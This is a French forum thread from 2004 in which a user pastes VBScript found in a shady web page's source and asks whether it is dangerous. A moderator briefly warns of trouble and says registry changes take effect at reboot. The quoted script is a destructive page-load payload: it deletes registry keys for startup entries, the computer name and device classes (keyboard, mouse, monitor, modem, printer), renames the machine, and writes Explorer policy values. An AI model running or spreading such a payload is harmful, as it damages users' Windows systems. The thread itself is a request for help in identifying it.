Vite ! question de modification de base de registre par page web

marcanto_5 Messages postés 47 Date d'inscription jeudi 26 février 2004 Statut Membre Dernière intervention 22 avril 2010 - 23 mai 2004 à 18:39
Twinuts Messages postés 5375 Date d'inscription dimanche 4 mai 2003 Statut Modérateur Dernière intervention 14 juin 2023 - 24 mai 2004 à 19:17
j'ai été sur un site et j'ai trouvé ça dans le code source, est-ce que c'est dangereux et qu'est-ce que ça fait ?

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run"
</script>

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName"
WshShell.RegWrite"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ComputerName"front national.com"
</script>

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Printer"
</script>

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Keyboard"
</script>

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Modem"
</script>

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Monitor"
</script>

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\PCMIA"
</script>

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Mouse"
</script>

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun"
0,"RED_DWORD"
</script>

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind"
0,"REG_DWORD"
</script>

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NorecentDocsMenu"
0,"REG_DWORD"
</script>

3 réponses

Twinuts Messages postés 5375 Date d'inscription dimanche 4 mai 2003 Statut Modérateur Dernière intervention 14 juin 2023 111
24 mai 2004 à 18:21
hello,

a mon avis tu vas avoir bcp de problème ac ton pc si tu essaye ça %-6
0
marcanto_5 Messages postés 47 Date d'inscription jeudi 26 février 2004 Statut Membre Dernière intervention 22 avril 2010
24 mai 2004 à 19:05
Ben, j'ai été sur un site par hasard (site pas très réglo) et le gars disait qu'il y avait plein de virus cachés sur la page.
Alors, j'ai regardé le code source et j'ai vu tout ça et j'ai reconnu HKEY_... de la base de registre.
Alors j'ai posté ce message pour en savoir plus.
Mais j'ai pas eu de problème (pas encore et j'espère ne pas en avoir)

L'adresse du site pas très réglo (ATTENTION photo choquante en bas) : ici
Je crois que c'est ça. Faudrait signaler un abus à multimania !
0
Twinuts Messages postés 5375 Date d'inscription dimanche 4 mai 2003 Statut Modérateur Dernière intervention 14 juin 2023 111
24 mai 2004 à 19:17
les modification du registre si ils ont eux lieux prennent effet au reboot de ton pc donc a voir
0
Rejoignez-nous